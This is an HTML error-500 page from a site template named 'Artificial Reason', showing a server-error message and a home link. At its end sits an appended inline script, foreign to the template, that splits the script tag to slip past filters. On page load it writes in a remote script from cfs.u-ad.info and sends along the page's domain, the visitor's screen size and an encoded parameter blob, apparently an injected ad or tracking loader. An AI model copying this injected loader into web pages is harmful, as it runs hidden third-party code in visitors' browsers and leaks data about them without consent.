
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">

    <title>Artificial Reason</title>

    <link rel="shortcut icon" href="assets/img/favicon.png" />

    <meta name="description" content="">

    <!-- CSS -->
    <link href="assets/css/preload.css" rel="stylesheet">
    
    <!-- Compiled in vendors.js -->
    <!--
    <link href="assets/css/bootstrap.min.css" rel="stylesheet">
    <link href="assets/css/bootstrap-switch.min.css" rel="stylesheet">
    <link href="assets/css/font-awesome.min.css" rel="stylesheet">
    <link href="assets/css/animate.min.css" rel="stylesheet">
    <link href="assets/css/slidebars.min.css" rel="stylesheet">
    <link href="assets/css/lightbox.css" rel="stylesheet">
    <link href="assets/css/jquery.bxslider.css" rel="stylesheet" />
    <link href="assets/css/buttons.css" rel="stylesheet">
    -->

    <link href="assets/css/vendors.css" rel="stylesheet">
    <link href="assets/css/syntaxhighlighter/shCore.css" rel="stylesheet" >

    <link href="assets/css/style-blue.css" rel="stylesheet" title="default">
    <link href="assets/css/width-full.css" rel="stylesheet" title="default">

    

    <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
        <script src="assets/js/html5shiv.min.js"></script>
        <script src="assets/js/respond.min.js"></script>
    <![endif]-->
</head>

<!-- Preloader -->
<div id="preloader">
    <div id="status">&nbsp;</div>
</div>

<body>


<div class="paper-back">
    <div class="absolute-center">
        <div class="text-center">
            <div class="title-logo animated fadeInDown animation-delay-5">artificial<span>reason</span></div>
            <div class="transparent-div animated fadeInUp animation-delay-8">
                <h1>Error 500</h1>
                <h2>Internal Server Error</h2>
                <p>Something has gone wrong we are trying to fix it. <br> Meanwhile you can go back to the homepage.</p>
                <a href="index.html" class="btn btn-ar btn-primary btn-lg">Go Home</a>
            </div>
        </div>
    </div>
</div>


<!-- Scripts -->
<!-- Compiled in vendors.js -->
<!--
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.cookie.js"></script>
<script src="assets/js/imagesloaded.pkgd.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
<script src="assets/js/bootstrap-switch.min.js"></script>
<script src="assets/js/wow.min.js"></script>
<script src="assets/js/slidebars.min.js"></script>
<script src="assets/js/jquery.bxslider.min.js"></script>
<script src="assets/js/holder.js"></script>
<script src="assets/js/buttons.js"></script>
<script src="assets/js/jquery.mixitup.min.js"></script>
<script src="assets/js/circles.min.js"></script>
<script src="assets/js/masonry.pkgd.min.js"></script>
<script src="assets/js/jquery.matchHeight-min.js"></script>
-->

<script src="assets/js/vendors.js"></script>

<script src="assets/js/styleswitcher.js"></script>

<!-- Syntaxhighlighter -->
<script src="assets/js/syntaxhighlighter/shCore.js"></script>
<script src="assets/js/syntaxhighlighter/shBrushXml.js"></script>
<script src="assets/js/syntaxhighlighter/shBrushJScript.js"></script>

<script src="assets/js/app.js"></script>

<script type="text/javascript">if(self==top){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);document.write("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request");document.write("?id=1");document.write("&amp;enc=telkom3");document.write("&amp;params=" + "4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlR6kOp54gN%2fVnG4RtOno%2fRu2QGuXdEaS25RVLc0flVDVFbqrTLST2w7tOZr3wLHOEaDDlizGeWi7fML0HUSN3yG2%2fHXqklteBnMP4pggG%2fFIGJCRYpBTzfdPR1yeV9mP%2fUD%2f4x9ujjWyvwbJ9VWSNYug%2faI46xMafLNCmYjD7aUYBfsyliUEhhzAw9GrdOUKebVjmLGkh3EC1%2fdguskeA%2fn%2ffHkETSMpknAGWDY5Nd158bk1ABCvm2X23i6e7VxzGCV%2f7kcLV7y8NSRhZ9R71YCwSQv4hGgNCTig8aZWTwcLuAKj5umuIG20KyAd%2fymVxMPKNm03eZsT73Li5ba8QSfgLZoeApN9ZgdkFoaxRGjud7eGhetjQKexAS98PRMgwcyGOPvkIfAKLjPGN3W2T3EfROLVxRmb3fae3qtsrSsmJMAxwOQLdwpK7xSlUZgFX8YiuyJNqV%2fgLOYRMEqt%2fq5j327ujxszLsB1uIzxxBxm5Q2XN9M%2bifB1urEX9yF2%2bafEqxyDHGVrzM7zV%2fn9ZBzSx1V08GLDGSuHZM7SuPHsJW6x4KQgJLHnp%2bQkSGnnZ6B4fJrkpzeCxAr0AcvSMb0g%3d%3d");document.write("&amp;idc_r="+idc_glo_r);document.write("&amp;domain="+document.domain);document.write("&amp;sw="+screen.width+"&amp;sh="+screen.height);document.write("></scr"+"ipt>");}</script><noscript>activate javascript</noscript></body></body>

</html>
